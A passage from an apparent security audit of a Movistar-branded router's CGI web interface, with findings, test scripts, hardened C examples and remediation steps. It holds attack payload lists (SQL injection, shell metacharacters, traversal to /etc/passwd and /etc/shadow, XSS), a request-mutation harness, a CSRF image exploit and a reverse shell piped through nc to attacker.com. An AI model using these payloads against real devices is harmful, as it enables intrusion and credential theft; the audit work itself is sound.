- Risk: Online brute force of the login, or offline cracking of the shadow hash, of a single shared root credential yields full device access
❌ Multiple jQuery Versions
- jQuery 1.3.2 (released 2009) - affected by CVE-2011-4969 (location.hash selector XSS), CVE-2012-6708 (selector HTML-string XSS), CVE-2015-9251 (cross-domain AJAX script execution), CVE-2019-11358 (prototype pollution) and CVE-2020-11022/CVE-2020-11023 (htmlPrefilter XSS)
- jQuery 1.6.3 (2011) - contains the fix for CVE-2011-4969 but remains affected by CVE-2012-6708, CVE-2015-9251, CVE-2019-11358 and CVE-2020-11022/11023
- jQuery 3.6.0/3.6.3 - relatively current; no selector or manipulation XSS known at the analysis date
- jQuery Migrate 1.4.1 restores several pre-1.9 behaviours on pages that load it; confirm per page which build and which shims are actually loaded
- Risk: XSS on any page that passes attacker-influenced strings (location.hash, URL parameters, device-stored names) into $() or .html() with a 1.x build
❌ No CSRF Protection Observed
- No CSRF token generation found
- No CSRF validation in CGI handlers
- Risk: Cross-site request forgery attacks
⚠️ Backend Input Validation Unverified
- Some CGI binaries may lack input validation
- Frontend validation != backend validation
- Need to audit: Each CGI for proper input sanitization
⚠️ Session File Storage
- Session files location not confirmed
- Might be predictable paths in /tmp/
- Risk: Session hijacking if files world-readable
⚠️ HTTPS Not Enforced
- If HTTPS not enforced, credentials sent in clear
- No evidence of forced HTTPS redirect
- Risk: Man-in-the-middle attacks
⚠️ Templates Embedded in Binaries
- HTML templates embedded in CGI binaries
- Difficult to audit for XSS
- Risk: Persistent XSS if templates have vulnerabilities
⚠️ Multiple Server Instances
- 4 mini_httpd instances possible
- Different configurations may have different security
- Risk: Inconsistent security posture
⚠️ Library Versions
- Firmware from 2024 but may use old libraries
- Need to check: OpenSSL/LibreSSL version in libcrypto
⚠️ Login Rate Limiting
- Login endpoint may lack rate limiting
- Risk: Brute-force attacks
⚠️ Debug Strings
- Debug strings in binaries
- May leak sensitive information
- Risk: Information disclosure
⚠️ Debug Build Flag
- isDebugVersionFW flag found
- Debug-specific CGI paths
- Risk: Debug endpoints may bypass security
⚠️ Telnet
- RemMagTELNET.cgi suggests Telnet support
- Risk: Unencrypted remote access
Found in jQuery Validate plugin:
- Form field validation
- Input format checking
- Client-side sanitization
Limitations:
- ✗ Can be bypassed via browser DevTools
- ✗ Can be bypassed by direct HTTP requests
- ✗ Not security-relevant (convenience only)
Functions Found:
- check_value() - Generic value checking
- cgiHtmlEscape() - HTML entity encoding
- escape_html() - HTML escaping
- escapeBackslash4JS() - JavaScript escaping
OID Validation:
- All CGI access data via OID (InternetGatewayDevice.*)
- OID layer may provide validation
- Functions: cccRdmGetObjectByOID(), cccRdmGetObjListByOID()
Methodology: To identify frontend/backend validation gaps, the following tests should be performed:
- Bypass Frontend Validation:
  - Capture legitimate request in browser
  - Modify POST data to invalid values
  - Submit directly via curl/Burp
  - Check if backend accepts invalid data
- Parameter Tampering:
  - Add extra parameters
  - Remove required parameters
  - Change parameter types (string→number, etc.)
- Boundary Testing:
  - Oversized inputs (buffer overflow)
  - Special characters injection
  - Null bytes, Unicode edge cases
Based on naming and common patterns:
High Priority for Testing:
- File Upload Handlers:
  - firewareUpgrade.cgi (firmware upload)
  - backupRestore.cgi (config upload)
  - ⚠️ Risk: Path traversal, malicious file upload
- Command Injection Candidates:
  - ping.cgi - May execute system ping command
  - DiagGeneral.cgi - May execute diagnostic commands
  - ⚠️ Risk: Command injection via unsanitized input
- SQL Injection Candidates (if DB used):
  - Any CGI with _list suffix (queries)
  - Filter/search functions
  - ⚠️ Risk: SQL injection (if using SQL database)
- Path Traversal:
  - fileSharing_browse.cgi - File browsing
  - viewlog.cgi - Log file access
  - ⚠️ Risk: Directory traversal to access sensitive files
- XSS Candidates:
  - Any CGI that echoes user input
  - menuJson.cgi - Dynamic content generation
  - naviView_partialLoad.cgi - Partial page loads
  - ⚠️ Risk: Reflected/Stored XSS
For Each CGI:
- Intercept legitimate request
- Test with:
  - SQL injection payloads: ' OR '1'='1, '; DROP TABLE--
  - Command injection: ; ls, | cat /etc/passwd, `whoami`
  - Path traversal: ../../../etc/passwd, ..\\..\\windows\\system32
  - XSS payloads: <script>alert(1)</script>, <img src=x onerror=alert(1)>
  - Buffer overflow: Very long strings (10KB+)
  - Format strings: %s%s%s%n
  - Null bytes: file.txt\0.jpg
- Check response for:
  - Execution indicators (error messages, timing)
  - Reflected input (XSS)
  - File disclosure
  - Server errors (500 = possible vulnerability)
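The procedure above (replay a captured request, mutate one field at a time, compare against the legitimate response) is mechanical enough to script. The harness below is an added example for this report, not tooling from the vendor or the device. The CGI path and field names in CAPTURED_REQUEST are illustrative stand-ins for whatever the browser actually sent; the three-second "slow" threshold, the cookie name and the HTTPS settings are assumptions.

```python
"""Frontend-bypass harness: replay a captured POST with mutated parameters.

Added example for this report, not vendor tooling. CAPTURED_REQUEST is an
illustrative capture (real field names come from the intercepted request);
the timing threshold in assess() and the cookie name are assumptions.
"""
import ssl
import time
import urllib.error
import urllib.parse
import urllib.request

# Illustrative capture: CGI path plus the form fields the browser sent.
CAPTURED_REQUEST = {"path": "/cgi-bin/ping.cgi", "fields": {"host": "8.8.8.8", "count": "4"}}

PAYLOADS = {                       # one representative per class from the checklist above
    "traversal": "../../../etc/passwd",
    "shell-meta": "8.8.8.8;id",
    "pipe": "8.8.8.8|id",
    "xss": "<img src=x onerror=alert(1)>",
    "format": "%s%s%s%n",
    "oversize": "A" * 10240,
    "nul": "file.txt\x00.jpg",
    "type-confusion": "-1",
    "empty": "",
}


def mutations(fields):
    """Yield (field, label, mutated-fields): every payload per field, a dropped field, an extra field."""
    for field in fields:
        for label, value in PAYLOADS.items():
            m = dict(fields)
            m[field] = value
            yield field, label, m
        m = dict(fields)
        del m[field]
        yield field, "dropped", m
    yield "*", "extra-param", {**fields, "zz_unexpected": "1"}


def assess(baseline, result, payload):
    """Compare a mutated response with the legitimate one; return the indicators seen."""
    flags = []
    if result["status"] >= 500:
        flags.append("server-error")
    if payload and payload in result["body"]:
        flags.append("reflected-unescaped")
    if result["seconds"] > baseline["seconds"] + 3.0:     # assumption: 3 s exceeds normal jitter
        flags.append("slow-response")
    if result["status"] == baseline["status"] and result["status"] < 400 and not flags:
        flags.append("accepted-silently")                 # backend took what the UI would refuse
    return flags


def send_form(base_url, path, fields, session_cookie, timeout=15):
    """POST urlencoded fields with the session cookie; measure wall time; never raise on HTTP status."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False                            # assumption: self-signed device certificate
    ctx.verify_mode = ssl.CERT_NONE
    data = urllib.parse.urlencode(fields).encode()
    req = urllib.request.Request(base_url + path, data=data, headers={
        "Cookie": "session=" + session_cookie,
        "Content-Type": "application/x-www-form-urlencoded"})
    start = time.monotonic()
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            status, body = resp.status, resp.read().decode("latin-1", "replace")
    except urllib.error.HTTPError as err:
        status, body = err.code, err.read().decode("latin-1", "replace")
    return {"status": status, "body": body, "seconds": time.monotonic() - start}


def run(base_url, session_cookie, capture=CAPTURED_REQUEST):
    """Send the baseline, then every mutation; return only the mutations that raised a flag."""
    baseline = send_form(base_url, capture["path"], capture["fields"], session_cookie)
    findings = []
    for field, label, fields in mutations(capture["fields"]):
        result = send_form(base_url, capture["path"], fields, session_cookie)
        flags = assess(baseline, result, fields.get(field, ""))
        if flags:
            findings.append((field, label, result["status"], flags))
    return findings


if __name__ == "__main__":
    for finding in run("https://192.168.1.1", "PASTE_SESSIONKEY_HERE"):
        print(finding)
```

The accepted-silently flag is the one that separates a backend that re-validates from one that only relies on jquery.validate: a 200 with the same body for "8.8.8.8;id" as for "8.8.8.8" means the CGI did not reject the metacharacter, even if it did not execute it.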
Menu Structure API:
- Endpoint: /cgi-bin/menuJson.cgi
- Purpose: Dynamic menu generation based on user permissions and features
- Format: JSON response
Tab Configuration API:
- Endpoints: Each page has a corresponding /html/pages/*/tab.json
- Purpose: Define page structure and CGI mappings
- Format: Static JSON files
Example Tab JSON Structure:
```json
{
  "tabTitle": "MLG_Menu_SubTitle_RemoteMGMT",
  "pageIndex": "maintenance-remotemgmt",
  "MLG_Tab_subTitle_General": {
    "url": "../../../cgi-bin/RemMagGeneral.cgi"
  },
  "MLG_Tab_subTitle_WWW": {
    "url": "../../../cgi-bin/RemMagWWW.cgi"
  }
}
```
MHS API Path:
- /mhs/APIS/ - Management Host System API
- /mhs/jsps/ - JSP-style management pages
Purpose: Likely for ISP/OLT remote management
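The tab.json files are the map from UI pages to handlers, so they also give the complement: CGI binaries that no page links to, which are the ones a tester would otherwise never exercise. The script below is an added example for this report, not code from the device. It follows the tab.json shape shown above (nested objects whose "url" values end in a cgi-bin name); the sample tab files and binary list are constructed from names in this report, not read from the image.

```python
"""Build the UI-reachable CGI inventory from tab.json files and list the orphans.

Added example for this report, not device code. Walks every 'url' value in a
tab.json (shape as in the example above) and compares the referenced handler
names against the cgi-bin/ listing. SAMPLE_TABS / SAMPLE_BINARIES are constructed.
"""
import json
import os
import posixpath


def cgi_refs_from_tab(tab):
    """Collect the basenames of every 'url' value anywhere in a parsed tab.json."""
    refs = set()

    def walk(node):
        if isinstance(node, dict):
            for key, value in node.items():
                if key == "url" and isinstance(value, str):
                    refs.add(posixpath.basename(value.split("?", 1)[0]))   # drop any query string
                else:
                    walk(value)
        elif isinstance(node, list):
            for value in node:
                walk(value)

    walk(tab)
    return refs


def inventory(tab_files, cgi_binaries):
    """tab_files: {relative path: json text}; cgi_binaries: names present in cgi-bin/."""
    referenced = {}
    for path, text in tab_files.items():
        for name in cgi_refs_from_tab(json.loads(text)):
            referenced.setdefault(name, set()).add(path)
    binaries = set(cgi_binaries)
    return {
        "reachable": sorted(set(referenced) & binaries),
        "orphans": sorted(binaries - set(referenced)),    # no page links them: test them directly
        "dangling": sorted(set(referenced) - binaries),   # a page points at a handler that is missing
        "pages_for": {name: sorted(paths) for name, paths in referenced.items()},
    }


def load_from_webroot(web_root):
    """Run the inventory over a real extract: html/pages/**/tab*.json plus the cgi-bin/ listing."""
    tab_files = {}
    pages_dir = os.path.join(web_root, "html", "pages")
    for dirpath, _, files in os.walk(pages_dir):
        for fname in files:
            if fname.startswith("tab") and fname.endswith(".json"):
                full = os.path.join(dirpath, fname)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    tab_files[os.path.relpath(full, pages_dir)] = fh.read()
    return inventory(tab_files, os.listdir(os.path.join(web_root, "cgi-bin")))


# Constructed sample: the remote-management tab from this report plus a NAT page.
SAMPLE_TABS = {
    "maintenance/remotemgmt/tab.json": json.dumps({
        "tabTitle": "MLG_Menu_SubTitle_RemoteMGMT",
        "pageIndex": "maintenance-remotemgmt",
        "MLG_Tab_subTitle_General": {"url": "../../../cgi-bin/RemMagGeneral.cgi"},
        "MLG_Tab_subTitle_WWW": {"url": "../../../cgi-bin/RemMagWWW.cgi"},
    }),
    "network/nat/tab.json": json.dumps({
        "MLG_Tab_subTitle_PortForwarding": {"url": "../../../cgi-bin/portForwarding.cgi?view=1"},
    }),
}
SAMPLE_BINARIES = ["RemMagGeneral.cgi", "RemMagWWW.cgi", "RemMagTELNET.cgi",
                   "portForwarding.cgi", "delete.cgi"]

if __name__ == "__main__":
    print(json.dumps(inventory(SAMPLE_TABS, SAMPLE_BINARIES), indent=2))
    # On an extracted image: print(load_from_webroot("/path/to/squashfs/usr/shared/web"))
```

Orphans are not automatically hidden or dangerous (menuJson.cgi may link some of them dynamically), but every orphan should be added to the direct-access probe and the mutation harness rather than assumed unreachable.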
Zero-Touch Provisioning:
- File: /var/zerotouch.json
- Purpose: Auto-configuration data from network
- Accessible via: /zerotouch.json symlink in web root
TR-069 CGI:
- tr69cfg.cgi - TR-069 configuration via web UI
- tr69cfg.html - TR-069 status page
TR-369/USP CGI:
- tr369.cgi - USP configuration
- agentMTP.cgi - Message Transfer Protocol config
- controller.cgi - USP controller management
- stompConn.cgi - STOMP protocol connections
- mqttClient.cgi - MQTT connections
Data Model:
- Based on InternetGatewayDevice OID structure
- USP Device.LocalAgent.* objects
- Backend handles OID queries via libbemodules.so
User Browser
↓
HTTPS request to a mini_httpd instance (e.g. port 443; each instance's listening port comes from its /etc/mini_httpd*.conf)
↓
mini_httpd parses the request (GET/POST), maps the path to a handler, sets the CGI/1.1 environment variables (including the Cookie header) and executes the CGI binary (/usr/shared/web/cgi-bin/X.cgi)
↓
CGI Binary Execution:
- Link libwebutil.so (session, HTML escaping)
- Link libbemodules.so (backend OID access)
- Parse POST/GET parameters
- Call cgiSessionCheck() - the session cookie is validated here, inside the handler, not by mini_httpd (see the session functions above); a handler that omits this call is reachable without login
- Process business logic
- Call OID functions (cccRdmGetObjectByOID, etc.)
- Generate HTML output (embedded in binary)
- Call escape_html() on user input
- Output to stdout
↓
mini_httpd receives stdout
↓
Add HTTP headers (Content-Type, Set-Cookie, etc.)
↓
Send response to browser
Web UI Change
↓
CGI validates input
↓
Update OID via libbemodules.so
↓
OID change triggers backend action (be_*)
↓
Backend module (libbemodules.so):
- Validate change
- Update RDM (Runtime Data Model)
- Write to /var/config.cfg
- Trigger system command (e.g., restart service)
- Send ubus notification
↓
Service reconfigures (dhcp, firewall, wifi, etc.)
↓
Configuration persisted to flash (/var/config.cfg)
Object Identifier (OID) Structure:
- Format: InternetGatewayDevice.Category.SubCategory.{i}.Parameter
- Example: InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.SSID
OID Access Functions:
- cccRdmGetObjectByOID(oid) - Get single object
- cccRdmGetObjListByOID(oid) - Get object list
- cccRdmSetObjectByOID(oid, value) - Set object value
OID Modules (in libbemodules.so):
- Each OID has:
  - OID_*_Boot - Initialization at boot
  - OID_*_ConfigLoaderFunc - Configuration loader
  - OID_*_ConfigLoaderFunc_Boot - Boot-time config load
Example OIDs Found:
- OID_InternetGatewayDevice_X_5067F0_Ext_LoginPrivilegeMgmt_i_ConfigLoaderFunc
- OID_InternetGatewayDevice_ManagementServer_X_5067F0_CAContent_ConfigLoaderFunc_Boot
- OID_InternetGatewayDevice_Mos_MosUserConfig_ConfigLoaderFunc
Severities and CVSS figures below are the analyst's static-review estimates; the items marked suspected elsewhere in this report were not confirmed by dynamic testing.
| Vulnerability | Severity (est.) | CVSS (est.) | Exploitability | Impact |
|---|---|---|---|---|
| Old jQuery versions with known XSS | CRITICAL | 8.5 | Easy | Account takeover, session theft |
| No CSRF protection | CRITICAL | 8.1 | Easy | Unauthorized config changes |
| Web login is the root system password ($p$root); /etc/shadow entry not recovered | UNVERIFIED | - | Medium | Full device compromise if the root password is empty, default or weakly hashed |
| Potential command injection (ping.cgi) | HIGH | 8.8 | Medium | Remote code execution |
| Path traversal (file browsers) | HIGH | 7.5 | Medium | Sensitive file disclosure |
| No HTTPS enforcement | HIGH | 7.4 | Medium | Credential interception |
| Session fixation possible | MEDIUM | 6.5 | Medium | Session hijacking |
| Verbose error messages | MEDIUM | 5.3 | Easy | Information disclosure |
| Debug features in production | MEDIUM | 6.1 | Hard | Potential bypass mechanisms |
| Telnet support | MEDIUM | 6.5 | Medium | Unencrypted access |
Affected Versions:
- jQuery 1.3.2 - CVE-2011-4969 (location.hash selector XSS), CVE-2012-6708 (selector HTML-string XSS), CVE-2015-9251, CVE-2019-11358, CVE-2020-11022/11023
- jQuery 1.6.3 - fixed for CVE-2011-4969; still affected by CVE-2012-6708, CVE-2015-9251, CVE-2019-11358, CVE-2020-11022/11023
Exploitation (the CVE-2011-4969 pattern; it only fires on a page whose script passes the URL fragment into a jQuery selector, e.g. $(location.hash), while that page loads a jQuery build older than 1.6.3):
```html
<!-- Trigger XSS via jQuery selector -->
http://192.168.1.1/page#<img src=x onerror=alert(document.cookie)>
```
Impact:
- Session cookie theft
- Account takeover
- CSRF bypass
- Malicious actions as authenticated user
Remediation:
- Consolidate on a single current 3.x build (3.6.3 or later at the time of analysis)
- Remove the jQuery 1.x builds and jQuery Migrate 1.4.1 from the web root
- Implement Content Security Policy (CSP)
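Whether the fragment payload above is reachable depends on a sink in the page's own JavaScript, so the per-page question is "does any script here feed location.hash into $()?". The scanner below is an added example for this report, not code from the device; it looks for that sink directly or through an intermediate variable in one file, and the JavaScript sample it runs on is constructed, not taken from the web root.

```python
"""Find the sink that makes the jQuery location.hash XSS reachable.

Added example for this report, not device code. CVE-2011-4969 needs page
JavaScript that feeds location.hash into $(); jQuery before 1.6.3 then parses
'#<img ...>' as HTML. This flags that pattern, directly or via a variable
assigned from location.hash in the same file. SAMPLE_JS is constructed.
"""
import re

JQ = r"(?:\$|jQuery)\s*\(\s*"
HASH = r"(?:window\.|document\.)?location\.hash"
DIRECT = re.compile(JQ + r"(?:decodeURIComponent\s*\(\s*|unescape\s*\(\s*)?" + HASH)
ASSIGN = re.compile(r"\b(?:var|let|const)?\s*([A-Za-z_$][\w$]*)\s*=\s*" + HASH)


def find_hash_selector_sinks(js_text):
    """Return [(line, how)] for every $(location.hash)-style call in js_text."""
    hits = []
    tainted = set()                                   # variables assigned from location.hash so far
    for lineno, line in enumerate(js_text.splitlines(), 1):
        if DIRECT.search(line):
            hits.append((lineno, "direct"))
        for name in sorted(tainted):
            if re.search(JQ + re.escape(name) + r"\b", line):
                hits.append((lineno, "via " + name))
        m = ASSIGN.search(line)                       # record after checking, so the sink must follow
        if m:
            tainted.add(m.group(1))
    return hits


def scan_files(paths):
    """Run the scanner over a list of .js files; returns {path: hits} for files with at least one hit."""
    results = {}
    for path in paths:
        with open(path, encoding="utf-8", errors="replace") as fh:
            hits = find_hash_selector_sinks(fh.read())
        if hits:
            results[path] = hits
    return results


SAMPLE_JS = """\
var tab = location.hash;            // constructed: a tab switcher that trusts the fragment
$(document).ready(function () {
    $(tab).addClass('active');      // sink reached via the variable
    $(window.location.hash).show(); // direct sink
    var safe = $('#' + 'main');     // no fragment involved
});
"""

if __name__ == "__main__":
    for lineno, how in find_hash_selector_sinks(SAMPLE_JS):
        print(f"line {lineno}: $() receives location.hash ({how})")
```

A hit only matters on a page that loads jquery-1.3.2.min.js (or another pre-1.6.3 build), so pair the scanner's output with the script tags of each page; a hit on a page that loads 3.6.3 is a code-quality note, not this CVE.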
Missing Protection:
- No CSRF tokens found in forms
- No SameSite cookie attribute
- No Referer validation on the configuration handlers examined (the remMag*.cgi endpoints do appear to check Referer; see the note at the end of this document)
Exploitation (parameter names are illustrative; any handler that accepts state changes over GET can be hit with a plain `<img>` tag from an attacker's page):
```html
<!-- Attacker site triggers config change -->
<img src="http://192.168.1.1/cgi-bin/portForwarding_add.cgi?port=22&ip=attacker.com">
```
Impact:
- Unauthorized firewall rule changes
- Port forwarding to attacker
- WiFi password changes
- Admin account creation
Remediation:
- Implement CSRF tokens (per-session random value)
- Validate the Origin header (fall back to Referer), failing closed when neither is present
- Use SameSite=Strict cookie attribute
- Accept state changes only via POST
- Require password for sensitive operations
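The token scheme recommended above, written out as an added example for a C CGI handler of the kind this device uses (this is not code from the device or from Zyxel). The token is generated once per session from the kernel CSPRNG, stored server-side next to the SessionKey, emitted as a hidden form field, and checked with a constant-time comparison together with the request method and the Origin header. The device origin string, the form field name and the session store are assumptions.

```c
/*
 * Added example (not the device's code): per-session CSRF token handling for
 * a C CGI backend. The device origin and the session lookup are assumptions.
 */
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define CSRF_TOKEN_BYTES 32
#define CSRF_TOKEN_HEX   (CSRF_TOKEN_BYTES * 2)   /* hex length without NUL */

/* Fill buf with len bytes from the kernel CSPRNG. Returns 0 on success. */
static int csprng_bytes(uint8_t *buf, size_t len)
{
    int fd = open("/dev/urandom", O_RDONLY);
    size_t got = 0;
    if (fd < 0)
        return -1;
    while (got < len) {
        ssize_t n = read(fd, buf + got, len - got);
        if (n <= 0) { close(fd); return -1; }
        got += (size_t)n;
    }
    close(fd);
    return 0;
}

/* Generate a fresh token (64 hex chars + NUL). Store it in the server-side
 * session when the session is created and emit it in every state-changing
 * form, e.g. <input type="hidden" name="csrf" value="...">. */
int csrf_token_generate(char out[CSRF_TOKEN_HEX + 1])
{
    uint8_t raw[CSRF_TOKEN_BYTES];
    if (csprng_bytes(raw, sizeof raw) != 0)
        return -1;
    for (size_t i = 0; i < sizeof raw; i++)
        snprintf(out + 2 * i, 3, "%02x", raw[i]);
    return 0;
}

/* Constant-time comparison so response timing cannot leak the token byte by
 * byte. The stored token must have the full length; the submitted value may
 * be anything the client sent, including a shorter or longer string. */
int csrf_token_equal(const char *stored, const char *submitted)
{
    if (!stored || !submitted)
        return 0;
    size_t ls = strlen(stored), lu = strlen(submitted);
    if (ls != CSRF_TOKEN_HEX)
        return 0;
    unsigned diff = (unsigned)(ls ^ lu);
    for (size_t i = 0; i < ls; i++)
        diff |= (unsigned)(stored[i] ^ (i < lu ? submitted[i] : 0));
    return diff == 0;
}

/* Origin (or Referer) must be exactly the device origin or a URL under it.
 * "http://192.168.1.1.attacker.com" fails because the byte after the prefix
 * is neither '/' nor the end of string. A missing header fails closed. */
int origin_allowed(const char *header, const char *own_origin)
{
    size_t n;
    if (!header || !own_origin)
        return 0;
    n = strlen(own_origin);
    if (strncmp(header, own_origin, n) != 0)
        return 0;
    return header[n] == '\0' || header[n] == '/';
}

/* Gate for every state-changing handler: POST only (so an <img> or link can
 * never change configuration), acceptable origin, matching token. */
int csrf_request_ok(const char *method, const char *session_token,
                    const char *form_token, const char *origin_hdr,
                    const char *own_origin)
{
    if (!method || strcmp(method, "POST") != 0)
        return 0;
    if (!origin_allowed(origin_hdr, own_origin))
        return 0;
    return csrf_token_equal(session_token, form_token);
}

/* Self-check of the generate -> validate path; returns 1 when a request with
 * the session's own token passes and one with another session's token fails. */
int csrf_selftest(void)
{
    char tok[CSRF_TOKEN_HEX + 1], other[CSRF_TOKEN_HEX + 1];
    const char *origin = "http://192.168.1.1";   /* assumed device origin */
    if (csrf_token_generate(tok) != 0 || csrf_token_generate(other) != 0)
        return 0;
    if (strlen(tok) != CSRF_TOKEN_HEX || strcmp(tok, other) == 0)
        return 0;
    return csrf_request_ok("POST", tok, tok, origin, origin) &&
           !csrf_request_ok("POST", tok, other, origin, origin);
}

int main(void)
{
    printf("csrf self-test: %s\n", csrf_selftest() ? "ok" : "FAILED");
    return 0;
}
```

The Origin check is a second, independent layer: it blocks the cross-site request even if a token ever leaks through the jQuery XSS described above, while the token protects the rare client that sends no Origin header at all is simply refused rather than waved through.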
Issues:
- Password configuration: the rpcd login entry uses `$p$root`. In OpenWrt's rpcd this prefix is not a hash format; it instructs rpcd to authenticate the login against the system password of the named Unix user, i.e. root's entry in /etc/shadow. The strength and uniqueness of that root password decide the real risk, and it was not recovered during this analysis.
- No account lockout mechanism confirmed
- No 2FA/MFA support
Exploitation:
- Brute force attack on login
- Dictionary attack
- Credential stuffing
Remediation:
- Set a strong, per-device root password stored with a modern crypt scheme in /etc/shadow (SHA-512 `$6$` at minimum); if the web login must not share root's credential, give rpcd its own login user with a dedicated crypt hash in the `password` option
- Implement account lockout (5 failed attempts)
- Add CAPTCHA after failed attempts
- Support 2FA/TOTP
Vulnerable CGIs (suspected from the binary names and strings; not confirmed by dynamic testing):
- ping.cgi - Likely executes the system `ping` command
- DiagGeneral.cgi - May run diagnostic commands
- mirror.cgi - Port mirroring configuration
Exploitation (assuming the parameter is named `target` and reaches a shell unescaped):
```http
POST /cgi-bin/ping.cgi HTTP/1.1
Host: 192.168.1.1
Content-Type: application/x-www-form-urlencoded

target=8.8.8.8; cat /etc/passwd
```
Alternative body for a reverse shell (requires a BusyBox `nc` built with `-e` support):
```
target=8.8.8.8 | nc attacker.com 4444 -e /bin/sh
```
Remediation:
- Use safe APIs (no shell execution: fork/exec with an argv array instead of system() or popen())
- Whitelist input (IP address literals only)
- Escape all shell metacharacters where a shell cannot be avoided
- Use parameterized execution
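To make the remediation concrete, here is an added example (not the device's ping.cgi, whose source is not available) showing the unsafe `system()`-style pattern next to a hardened replacement that whitelists IP literals with `inet_pton()` and runs `ping` through `fork`/`execvp` with an argv array. The parameter name `target`, the `-c 3 -W 2` options and a `ping` binary that handles both address families are assumptions.

```c
/*
 * Added example (not the device's code): unsafe command building versus a
 * whitelisted, shell-free ping. Parameter name and ping flags are assumed.
 */
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Unsafe pattern: the CGI parameter is spliced into a shell command line.
 * With target = "8.8.8.8; cat /etc/passwd" a shell would run two commands.
 * Kept here only as a string builder so the result can be inspected; nothing
 * in this file passes it to system(). */
int build_ping_cmd_unsafe(char *out, size_t outlen, const char *target)
{
    return snprintf(out, outlen, "ping -c 3 %s", target);
}

/* Whitelist: accept only an IPv4 or IPv6 literal. inet_pton() rejects
 * spaces, ';', '|', '$', backticks, hostnames and anything beginning with
 * '-', so option injection against ping itself is ruled out as well. */
int ping_target_ok(const char *target)
{
    unsigned char addr[16];
    if (!target || strlen(target) > 45)       /* longest IPv6 text form */
        return 0;
    return inet_pton(AF_INET, target, addr) == 1 ||
           inet_pton(AF_INET6, target, addr) == 1;
}

/* Hardened replacement: fork/exec with an argv array. No shell is involved,
 * so metacharacters in target are never interpreted even if the whitelist
 * were later loosened to hostnames. Returns ping's exit status, or -1 when
 * the target is refused or the process cannot be started. */
int run_ping_safe(const char *target)
{
    int status;
    pid_t pid;
    if (!ping_target_ok(target))
        return -1;
    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { "ping", "-c", "3", "-W", "2", (char *)target, NULL };
        execvp("ping", argv);
        _exit(127);                           /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char **argv)
{
    /* Constructed sample input: the first payload from the finding above. */
    const char *t = argc > 1 ? argv[1] : "8.8.8.8; cat /etc/passwd";
    char cmd[256];
    build_ping_cmd_unsafe(cmd, sizeof cmd, t);
    printf("a shell would run : %s\n", cmd);
    printf("whitelist verdict : %s\n", ping_target_ok(t) ? "accept" : "reject");
    return 0;
}
```

If hostnames ever have to be accepted, keep the argv execution, validate against the RFC 1123 hostname character set, and additionally reject a leading `-` so the value can never be parsed as a ping option.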
Vulnerable CGIs:
- fileSharing_browse.cgi - File browser
- viewlog.cgi - Log viewer
- backupRestore.cgi - Config file access
Exploitation (untested; the parameter names `file` and `path` are assumed):
```http
GET /cgi-bin/viewlog.cgi?file=../../../etc/shadow HTTP/1.1
GET /cgi-bin/fileSharing_browse.cgi?path=../../../../etc/passwd HTTP/1.1
```
Remediation:
- Validate file paths against a whitelist
- Use chroot for file operations
- Canonicalize paths (realpath()) and verify the result still starts with the intended base directory
- Deny `..` in all file parameters, checking after percent-decoding so `%2e%2e` is caught too
/usr/shared/web/html/config.json:
```json
{
  "CONFIG": {
    "Implementation": "api",
    "DefaultLanguage": "pt",
    "Branding": "movistar",
    "Country": "ES",
    "LANGUAGES": [
      {"file": "language.en.json", "shortName": "en"},
      {"file": "language.pt.json", "shortName": "pt"}
    ],
    "SessionMaxTime": 600,
    "SessionWarning": false,
    "UpdateStep": 10,
    "VENDORCONFIGURATION": {
      "Availability": true,
      "Link": "http://192.168.1.1/main.html"
    },
    "LanConfEnabled": true,
    "Supported3G": true,
    "ManualPPPoE": true
  }
}
```
Key Settings:
- Session timeout: 600 seconds (10 minutes)
- Default language: Portuguese
- Branding: Movistar (Telefonica)
- 3G support: Enabled
- Manual PPPoE: Enabled
- Vendor configuration link uses plain http://, consistent with the missing HTTPS enforcement noted above
Runtime generated at:
- /etc/mini_httpd1.conf
- /etc/mini_httpd2.conf
- /etc/mini_httpd3.conf
- /etc/mini_httpd4.conf
Expected Configuration (reconstructed; the generated files were not captured. Stock mini_httpd spells the TLS options `ssl` and `certfile=` rather than `ssl_port=`/`ssl_cert=`, so confirm the key names this fork emits on a live unit before relying on them):
```ini
port=80
ssl_port=443
ssl_cert=/etc/mycert/web.pem
chroot=/usr/shared/web
user=nobody
cgipat=/cgi-bin/*
pidfile=/tmp/mini_httpd1.pid
logfile=/tmp/mini_httpd1.log
```
/etc/config/rpcd:
```
config rpcd
    option socket /var/run/ubus/ubus.sock
    option timeout 30

config login
    option username 'root'
    option password '$p$root'
    list read '*'
    list write '*'
```
1. Update jQuery Libraries
   - Remove jQuery 1.x versions
   - Use only jQuery 3.6.3
   - Test all JavaScript functionality
2. Implement CSRF Protection
   - Generate random token per session
   - Include in all forms as hidden field
   - Validate token on all state-changing requests
3. Strengthen Authentication
   - Verify the root password in /etc/shadow (rpcd's `$p$root` entry delegates web login to it) and replace any default with a strong per-device password; give the web login its own rpcd user and crypt hash if it must not share root's credential
   - Implement account lockout (5 attempts)
   - Force password change on first login
4. Enforce HTTPS
   - Redirect HTTP → HTTPS automatically
   - Set HSTS header
   - Use secure cookies only
5. Input Validation Audit
   - Review all 211 CGI binaries
   - Implement whitelist validation
   - Add length limits
6. Add Security Headers
   ```http
   Content-Security-Policy: default-src 'self'
   X-Frame-Options: DENY
   X-Content-Type-Options: nosniff
   Strict-Transport-Security: max-age=31536000
   ```
7. Session Security
   - Add SameSite=Strict to cookies
   - Bind sessions to IP addresses (already done)
   - Regenerate SessionKey on privilege escalation
8. Disable Unnecessary Services
   - Disable Telnet (use SSH only)
   - Disable debug endpoints
   - Remove HTTP server instances 2-4 if unused
9. Code Audit
   - Static analysis of all CGI binaries
   - Penetration testing
   - Fuzzing file upload handlers
10. Architecture Improvements
    - Migrate to modern web framework (React/Vue + REST API)
    - Separate frontend from backend
    - Use JSON API instead of CGI
11. Monitoring & Logging
    - Log all authentication attempts
    - Alert on failed login patterns
    - SIEM integration
12. Regular Updates
    - Automated dependency scanning
    - Security patch pipeline
    - CVE monitoring
- login_advance.cgi
- logout_advance.cgi
- passLogout.cgi
